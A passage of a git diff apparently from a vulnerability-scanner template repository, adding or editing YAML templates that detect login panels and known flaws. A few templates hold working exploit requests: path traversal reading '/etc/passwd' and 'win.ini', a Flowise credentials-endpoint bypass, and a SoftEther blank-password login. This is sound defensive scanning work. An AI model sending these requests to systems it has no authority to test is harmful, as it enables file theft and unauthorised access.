POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- 'contains(header, "text/plain")'
condition: and
# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950

51
http/cves/2024/CVE-2024-3097.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-3097
info:
name: NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure
author: DhiyanesDK
severity: medium
description: |
The WordPress Gallery Plugin NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.
reference:
- https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40
- https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve
- https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-3097
cwe-id: CWE-862
epss-score: 0.00052
epss-percentile: 0.19521
cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:*
metadata:
vendor: imagely
product: nextgen_gallery
framework: wordpress
publicwww-query: "/wp-content/plugins/nextgen-gallery/"
tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":'
- '"image":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950

4
http/cves/2024/CVE-2024-31621.yaml
View File

@ -16,7 +16,7 @@ info:
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise
requests:
http:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
@ -33,4 +33,4 @@ requests:
- type: status
status:
- 200
# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950

4
http/cves/2024/CVE-2024-32399.yaml
View File

@ -21,7 +21,7 @@ info:
shodan-query: html:"RaidenMAILD"
tags: cve,cve2024,lfi,raiden,mail,server
requests:
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
@ -33,4 +33,4 @@ requests:
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950

43
http/default-logins/softether/softether-vpn-default-login.yaml Normal file
View File

@ -0,0 +1,43 @@
id: softether-vpn-default-login
info:
name: SoftEther VPN Admin Console - Default Login
author: bhutch
severity: high
description: |
The administrative password for the SoftEther VPN Server is blank.
reference:
- https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server
metadata:
verified: true
max-request: 1
shodan-query: title:"SoftEther VPN Server"
tags: misconfig,vpn,softether,default-login
http:
- raw:
- |
GET /admin/default/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- administrator
password:
-
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Create new Virtual Hub'
- 'Toggle navigation'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950

31
http/exposed-panels/ackee-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: ackee-panel
info:
name: Ackee Panel - Detect
author: userdehghani
severity: info
description: |
self-hosted, node.js based analytics tool for those who care about privacy.
reference:
- https://ackee.electerious.com/
- https://docs.ackee.electerious.com/
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-1495233116
tags: panel,ackee,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(tolower(body), "<title>ackee")'
- "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))"
condition: or
# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950

17
http/exposed-panels/apache/apache-apisix-panel.yaml
View File

@ -1,19 +1,19 @@
id: apache-apisix-panel
info:
name: Apache APISIX Login Panel
author: pikpikcu
name: Apache APISIX Login Panel - Detect
author: pikpikcu,righettod
severity: info
description: An Apache APISIX login panel was detected.
classification:
cwe-id: CWE-200
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
metadata:
fofa-query: title="Apache APISIX Dashboard"
max-request: 1
product: apisix
vendor: apache
tags: apache,apisix,panel
fofa-query: title="Apache APISIX Dashboard"
tags: apache,apisix,panel,login,detect
http:
- method: GET
@ -30,4 +30,11 @@ http:
- type: status
status:
- 200
# digest: 4b0a004830460221009511db3bd4110569d3adb76780b1eae709159c92d71b9fd0e0f3665aa25c65ef02210080459d36c4880e531941e8516355f1deb7e67881bc8a203be2cf734becaa4d4e:922c64590222798bb761d5b6d8e72950
extractors:
- type: regex
part: header
group: 1
regex:
- '(?i)Server:\s+APISIX\/([0-9.]+)'
# digest: 490a00463044022077db8164de460b6d9fad9c437f6f20ddff3d1130da4410d3e8fef855a71f69cc02205e85b466ed5fc18cbf90faa089c1beeae3b91c11e43f89454ab0b3eca85e9f73:922c64590222798bb761d5b6d8e72950

15
http/exposed-panels/cacti-panel.yaml
View File

@ -12,10 +12,13 @@ info:
cwe-id: CWE-200
cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
product: cacti
vendor: cacti
tags: tech,cacti,login,panel
shodan-query: http.favicon.hash:-1797138069
fofa-query: icon_hash="-1797138069"
tags: cacti,login,panel,detect
http:
- method: GET
@ -25,18 +28,14 @@ http:
stop-at-first-match: true
matchers-condition: and
matchers-condition: or
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<title>Login to Cacti</title>"
- "The Cacti Group"
condition: and
condition: or
- type: regex
part: header
@ -49,4 +48,4 @@ http:
group: 1
regex:
- "<div class='versionInfo'>Version (.*) |"
# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950

4
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml
View File

@ -14,7 +14,7 @@ info:
shodan-query: html:"Cassia Bluetooth Gateway Management Platform"
tags: cassia,gateway,login,panel
requests:
http:
- method: GET
path:
- "{{BaseURL}}/cassia/login"
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206c69b6c8548d94d08177c560687c5ec6af029a7511c5c523f616cf8f15844d4c022049e60a52750b8da203076f14e8fc0a4389656a8d09dea222c577ee04de8a08af:922c64590222798bb761d5b6d8e72950

35
http/exposed-panels/craftercms-panel.yaml Normal file
View File

@ -0,0 +1,35 @@
id: craftercms-panel
info:
name: CrafterCMS Login Panel - Detect
author: righettod
severity: info
description: |
CrafterCMS login panel was detected.
reference:
- https://craftercms.org/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"craftercms"
tags: panel,craftercms,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/studio/login"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
# digest: 4a0a004730450221008f0a504337b6d23c677831b726cc8db9fd0d2f121cd363898e291746020c21010220587b99ea2eba7fdccb1f6883bbb072ee3516c6e0965f58f6b6ea1a38da1f6a91:922c64590222798bb761d5b6d8e72950

36
http/exposed-panels/easyvista-panel.yaml Normal file
View File

@ -0,0 +1,36 @@
id: easyvista-panel
info:
name: EasyVista Login Panel - Detect
author: righettod
severity: info
description: |
EasyVista login panel was detected.
reference:
- https://www.easyvista.com/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"Easyvista"
tags: panel,easyvista,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/index.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>easyvista apps</title>", "easyvista-bundle.min.js", "packages_com_easyvista_core")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)package:\s+"([a-z0-9._-]+)"'
- '(?i)version&nbsp;:&nbsp;([a-z0-9._-]+)'
# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950

36
http/exposed-panels/fortinet/f5-next-central-manager.yaml Normal file
View File

@ -0,0 +1,36 @@
id: f5-next-central-manager
info:
name: F5 Next Central Manager Panel - Detect
author: EgemenKochisarli
severity: info
description: |
F5 Next Central Manager login panel was detected.
reference:
- https://clouddocs.f5.com/bigip-next/latest/use_cm/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: f5
product: big-ip
tags: panel,fortinet,login
http:
- method: GET
path:
- "{{BaseURL}}/gui/login"
matchers-condition: and
matchers:
- type: word
words:
- "<title>BIG-IP Next | Central Manager"
- type: status
status:
- 200
# digest: 4b0a00483046022100b3c8cbebbf5b6db93eb84a58ba8a629736bd27b2715e4e907afe8d4c16ffe808022100efb3278f5f84739a8835ab53f02255849df148e45d16593a8cf6655c65b51ed8:922c64590222798bb761d5b6d8e72950

31
http/exposed-panels/ghost-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: ghost-panel
info:
name: Ghost Panel - Detect
author: userdehghani
severity: info
description: |
Beautiful, modern publishing with email newsletters and paid subscriptions built-in.
reference:
- https://ghost.org/
metadata:
verified: true
max-request: 1
fofa-query: app="Ghost"
tags: panel,ghost,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/ghost/#/signin"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Ghost Admin'
- 'content="Ghost"'
condition: or
case-insensitive: true
# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950

24
http/exposed-panels/jfrog-login.yaml
View File

@ -4,28 +4,30 @@ info:
name: JFrog Login Panel - Detect
author: dhiyaneshDK
severity: info
description: JFrog login panel was detected.
description: |
JFrog login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6797
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: panel,jfrog,edb
shodan-query: http.title:"JFrog"
tags: panel,jfrog,edb,detect,login
http:
- method: GET
path:
- '{{BaseURL}}/ui/login/'
- '{{BaseURL}}/ui/favicon.ico'
matchers-condition: and
stop-at-first-match: true
matchers:
- type: word
words:
- '<title>JFrog</title>'
- type: status
status:
- 200
# digest: 4b0a00483046022100bfa95e2d95db535d51023522742e67105a4ca44c2195a7bcae99ff18a8a3e215022100cc08d7c15e5b503a664ce40eeeb750549e654f290a8266192954330d210549ac:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'status_code==200 && contains(body, "<title>JFrog")'
- "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))"
condition: or
# digest: 4a0a004730450221009cfe5c81bde3f5c9462974f80c97205e62b24f03aab1a1893ca852fc0b0b49a802201c6f8e2531a0dc3974eb9f8b284db5527b43eaa7041e2eddbe10753137f5931f:922c64590222798bb761d5b6d8e72950

4
http/exposed-panels/kiwitcms-login.yaml
View File

@ -14,7 +14,7 @@ info:
metadata:
max-request: 1
product: kiwi_tcms
shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337
shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
vendor: kiwitcms
tags: kiwitcms,panel
@ -33,4 +33,4 @@ http:
group: 1
regex:
- "Version ([0-9.]+)"
# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c7e0445fb0c4273073704f89e15d3964d3730fa6c57a6d21ae98ba39406c076102210096a4c3868ade5124d38d7a8312bcbd096227b224884baaef2d97163e6b82c9f0:922c64590222798bb761d5b6d8e72950

34
http/exposed-panels/matomo-login-portal.yaml
View File

@ -1,34 +0,0 @@
id: matomo-login-portal
info:
name: Matomo Login Panel - Detect
author: Arr0way
severity: info
description: Matomo logjn panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
metadata:
max-request: 2
product: matomo
vendor: matomo
tags: panel,matomo
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/matomo"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "Sign in"
- "Matomo"
condition: and
# digest: 4a0a0047304502201c4b93876d4b04d9b5b75c8c17fe6d03ec45002b413803af50ee269c8086c434022100ee5a2b5964c46e904239af345684bc5b2b5f2ebfba45afabdb42f040ca828a2d:922c64590222798bb761d5b6d8e72950

46
http/exposed-panels/matomo-panel.yaml Normal file
View File

@ -0,0 +1,46 @@
id: matomo-panel
info:
name: Matomo Panel - Detect
author: Arr0way,userdehghani
severity: info
description: |
google analytics alternative that protects your data and your customers privacy.
reference:
- https://matomo.org/
- https://matomo.org/faq/on-premise/installing-matomo/#getting-started
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
product: matomo
vendor: matomo
shodan-query: http.favicon.hash:-2023266783
tags: panel,matomo,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/index.php"
- "{{BaseURL}}/plugins/CoreHome/images/favicon.png"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'Sign in - Matomo'
- 'content="Matomo'
- 'title="Matomo'
condition: or
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))"
# digest: 4a0a0047304502205217330d775233ed1853dd31211905403034b6f585c3e2b9623fcc9a8b79b5b0022100b9b40d58f73228425c1491bdce70eb1a39d2e087072d50864dad2f181de17cbf:922c64590222798bb761d5b6d8e72950

33
http/exposed-panels/n8n-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: n8n-panel
info:
name: n8n Panel - Detect
author: userdehghani
severity: info
description: |
The worlds most popular workflow automation platform for technical teams
reference:
- https://n8n.io/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-831756631
tags: panel,n8n,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/signin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>n8n.io'
case-insensitive: true
- type: status
status:
- 200
# digest: 490a00463044022059cb68de4684a6a5b94dca8dbf24660e161eecceb07d6a955c1fa897ba7713da02200a3ec6dda7bffc4b05016a3055540bfb789fead4544178489fd6494c108cd483:922c64590222798bb761d5b6d8e72950

9
http/exposed-panels/netscaler-aaa-login.yaml
View File

@ -2,7 +2,7 @@ id: netscaler-aaa-login
info:
name: NetScaler AAA Login Panel - Detect
author: dhiyaneshDk
author: dhiyaneshDk,righettod
severity: info
description: NetScaler AAA login panel was detected.
reference:
@ -15,7 +15,7 @@ info:
max-request: 1
product: netscaler
vendor: citrix
tags: panel,netscaler,login,edb,citrix
tags: panel,netscaler,login,edb,citrix,detect
http:
- method: GET
@ -26,5 +26,6 @@ http:
- type: word
words:
- "NetScaler AAA</title>"
condition: and
# digest: 4a0a004730450221009bc41767207ec08510c28fd7db74f0a6be829e289c5817412fbf7c1a17229135022002a8cc7233b69e588e94f5ed9919a36b6964009eab52b096e3017b499ef78f6c:922c64590222798bb761d5b6d8e72950
- "_ctxstxt_NetscalerAAA"
condition: or
# digest: 4b0a00483046022100fc8390a0699abae759299064c59fc5ac4a3e0fda101ec74ba62d8362437ea339022100a02a6c73d54ef2e5655e15c3526ff0d9e2c91abbc96e47cf045c71e19c51618a:922c64590222798bb761d5b6d8e72950

36
http/exposed-panels/nocodb-panel.yaml Normal file
View File

@ -0,0 +1,36 @@
id: nocodb-panel
info:
name: NocoDB Panel - Detect
author: userdehghani
severity: info
description: |
NocoDB Login panel was discovered.
reference:
- https://www.nocodb.com/
- https://docs.nocodb.com/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:206985584
tags: panel,nocodb,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/dashboard/#/signin"
- "{{BaseURL}}/dashboard/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'content="NocoDB'
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))"
# digest: 4a0a004730450220714636130a5e204032c15b6e2559e50c5dc598f220ac85fdf5d0d0d98feec3ee022100836baf611ae336e0d9d107a9c9d3acd8c159804a0632983e87209fb0819e2790:922c64590222798bb761d5b6d8e72950

34
http/exposed-panels/pocketbase-panel.yaml Normal file
View File

@ -0,0 +1,34 @@
id: pocketbase-panel
info:
name: PocketBase Panel - Detect
author: userdehghani
severity: info
description: |
PocketBase Login panel was discovered.
reference:
- https://pocketbase.io/
- https://pocketbase.io/docs/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:981081715
tags: panel,pocketbase,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/_/#/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PocketBase'
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100f1f276ce2fb2420838d2f811e2b64dc4f881f87e145e1f5eaf9a6c5526bdc1fe022100c06c702de4ff917e3a3dc700b377ff3054243af2c89c6e2bcd36c447560b85e2:922c64590222798bb761d5b6d8e72950

31
http/exposed-panels/qlikview-accesspoint-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: qlikview-accesspoint-panel
info:
name: QlikView AccessPoint Login Panel - Detect
author: righettod
severity: info
description: |
QlikView AccessPoint login panel was detected.
reference:
- https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm
metadata:
verified: true
max-request: 1
shodan-query: title:"QlikView - AccessPoint"
tags: panel,qlikview,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/qlikview/FormLogin.htm"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")'
condition: and
# digest: 4a0a00473045022100a06d783199cb65eae6682616e041f14ba523e0f4d1e74241c6dee95de224ef4b02201fdc28b5e00862150ebb7320d3188b6d7a41b2b7377c8aca554768b3d99c435a:922c64590222798bb761d5b6d8e72950

28
http/exposed-panels/tiny-rss-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: tiny-rss-panel
info:
name: Tiny RSS Panel - Detect
author: userdehghani
severity: info
description: |
Tiny Tiny RSS is a free RSS feed reader
reference:
- https://tt-rss.org/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-418614327
tags: panel,tiny-rss,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code==200'
- 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")'
condition: and
# digest: 4a0a00473045022100840ed0e143bb8658c51929c452c2c7f11395d2611929d4b2306fb2c7bdfc881002205726c2e4a715d6d13a7b64305182dd78122a0c4e647bf3e6ed66f815b2d8577b:922c64590222798bb761d5b6d8e72950

43
http/exposed-panels/umami-panel.yaml Normal file
View File

@ -0,0 +1,43 @@
id: umami-panel
info:
name: Umami Panel - Detect
author: userdehghani
severity: info
description: |
simple, fast, privacy-focused, open-source analytics solution.
reference:
- https://umami.is/
- https://umami.is/docs
metadata:
verified: true
max-request: 3
shodan-query: http.favicon.hash:-130447705
tags: panel,umami,login,detect
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_any(tolower(body), "Login | umami", "umami</div>", "umami</h1>", "<title>umami - login")'
- "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))"
condition: or
- method: GET
path:
- "{{BaseURL}}/~404"
extractors:
- type: regex
part: body
regex:
- 'v(?P<version>\d+\.\d+\.\d+)'
# digest: 490a00463044022057cb7369c95c71f95c75ff52799af65aadbe03982e0a51870dc0b8912897932402201c21a65921c649934e56e808ee0076cc892841ec816ad72cbcb49549e3995a62:922c64590222798bb761d5b6d8e72950

40
http/exposed-panels/unleash-panel.yaml Normal file
View File

@ -0,0 +1,40 @@
id: unleash-panel
info:
name: Unleash Panel - Detect
author: userdehghani
severity: info
description: |
Open-source feature management solution built for developers.
reference:
- https://www.getunleash.io/
metadata:
verified: true
max-request: 3
shodan-query: http.favicon.hash:-608690655
tags: panel,unleash,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/sign-in"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Unleash'
- 'content="unleash'
- 'alt="getunleash'
- 'Sign-in - Unleash hosted'
case-insensitive: true
condition: or
- type: dsl
dsl:
- "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))"
# digest: 490a00463044022014fd08bb5e7f980ecf35eb263ef728dff1b0b8ca20cfee86410abeb3f180c9c5022036ad4163750eaee7d3271a6ccc3f10245b3d4aa1a16be7f68e9eb6e04b2e54c0:922c64590222798bb761d5b6d8e72950

6
http/exposed-panels/uptime-kuma-panel.yaml
View File

@ -8,12 +8,12 @@ info:
Realtime website and application monitoring tool
reference:
- https://github.com/louislam/uptime-kuma
- https://uptime.kuma.pet/docs/
- https://github.com/louislam/uptime-kuma/wiki
metadata:
max-request: 1
shodan-query: title:"Uptime Kuma"
verified: true
tags: uptime,kuma,panel,login
tags: uptime,kuma,panel,login,detect
http:
- method: GET
@ -29,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100a76857034836e1a9ae14af5352e203fb414f9b8cdb6e26e5cec35bb904d9afb002202568b0be6be509bd7442b6649aecbb7cb453c5e7d7f9726d7b81b4e60baefc8b:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ebe940aa6e53fd44bcd7be03b75902f7ce7cb1bfe215dd4723f649ff99e1d778022042ca248ccf5749cc7c89884b88353eff6869ea026ddeec90a7c4d51464b5287c:922c64590222798bb761d5b6d8e72950

31
http/honeypot/tpot-honeypot-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: tpot-honeypot-detect
info:
name: T-Pot Honeypot - Detect
author: rxerium
severity: info
description: |
A tpot dashboard has been detected
reference:
- https://github.com/telekom-security/tpotce
tags: tpot,honeypot
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>T-Pot</title>"
- "T-Pot @ Github"
- "T-Pot ReadMe"
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210092e8c105082a6686c4a5241f7fe90b7fe5f5f14e5e65ee874e138dd69c1462b3022100d38690efa1cc7e6e88c421640d5647ef94b715ac36a843d633116ae915c69d6e:922c64590222798bb761d5b6d8e72950

4
http/misconfiguration/gocd/gocd-cruise-configuration.yaml
View File

@ -11,7 +11,7 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,config,exposure,misconfig
http:
@ -31,4 +31,4 @@ http:
- "webhookSecret"
- "tokenGenerationKey"
condition: and
# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950

4
http/misconfiguration/gocd/gocd-encryption-key.yaml
View File

@ -11,7 +11,7 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,exposure,misconfig
http:
@ -38,4 +38,4 @@ http:
- type: regex
regex:
- "([a-z0-9]){32}"
# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950

4
http/misconfiguration/gocd/gocd-unauth-dashboard.yaml
View File

@ -7,7 +7,7 @@ info:
description: GoCd Dashboard is exposed.
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,unauth,misconfig
http:
@ -29,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950

14
http/misconfiguration/https-to-http-redirect.yaml
View File

@ -2,7 +2,7 @@ id: https-to-http-redirect
info:
name: HTTPS to HTTP redirect Misconfiguration
author: kazet
author: kazet,idealphase
severity: info
description: |
Detects whether there is a redirect from https:// to http://
@ -16,11 +16,19 @@ http:
path:
- "{{BaseURL}}"
